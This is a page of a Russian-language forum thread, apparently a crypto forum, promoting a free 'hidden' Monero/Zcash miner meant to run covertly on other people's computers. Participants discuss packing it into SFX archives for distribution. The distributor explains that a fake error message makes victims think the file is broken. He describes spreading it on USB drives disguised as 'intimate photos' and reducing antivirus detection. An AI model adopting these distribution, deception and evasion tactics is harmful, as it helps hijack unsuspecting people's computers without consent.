Pages:
Author

Topic: Бесплатный скрытый майнер Monero+Zcash - page 11. (Read 3388 times)

newbie
Activity: 1
Merit: 0
Видимо я совсем туплю, но раньше не имел с этим дела
В твоей сборке майнера лежат два файла: сам майнер и "system64dr.sys"(в который кошельки прописывать).
Если я создам из этих двух файлов SFX архив и побегу это раскидывать, будет ли всё корректно работать?

Проинструктируй, пожалуйста)
Честно говоря, я совсем новичок в этом, но очень интересно
newbie
Activity: 95
Merit: 0
При запуске выдаст псевдоошибку в консоли,  это нормально, майнер установился. так пользователь подумает что файл битый
newbie
Activity: 95
Merit: 0
Сборка обновлена, теперь можно прописать любой пул для монеро в файле pool.cnf
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.

Как проверить что я майню на свои кошельки?
Наверное на них должно приходить намайненное)) Если не приходит, значит вы майните не туда) Обращайтесь Grin
Так если я майнил минут 10 то даже минимальную выплату не намайнил, где посмотреть что идет от меня хэш на пул?
Если майните на дварфе, то смотрим тут http://dwarfpool.com/xmr/address?wallet=кошелёк
Про распространение через флешки. Туда просто записывается ИНТИМ_ФОТО_С_ДР.exe

Постараюсь почистить код, чтоб детект снизить.
newbie
Activity: 1
Merit: 0
К сожалению,с сегодняшнего дня аваст стал блочить майнер(( теперь даже скачать не дает и всё автоматом поудалял с компа
https://hkar.ru/SNsK
newbie
Activity: 3
Merit: 0
Сборка обновлена, теперь можно прописать любой пул для монеро в файле pool.cnf
Новые ссылки:
Зеркало 1
Зеркало 2
В первом сообщении ссылки также обновлены.

Как проверить что я майню на свои кошельки?
Наверное на них должно приходить намайненное)) Если не приходит, значит вы майните не туда) Обращайтесь Grin
Так если я майнил минут 10 то даже минимальную выплату не намайнил, где посмотреть что идет от меня хэш на пул?
newbie
Activity: 54
Merit: 0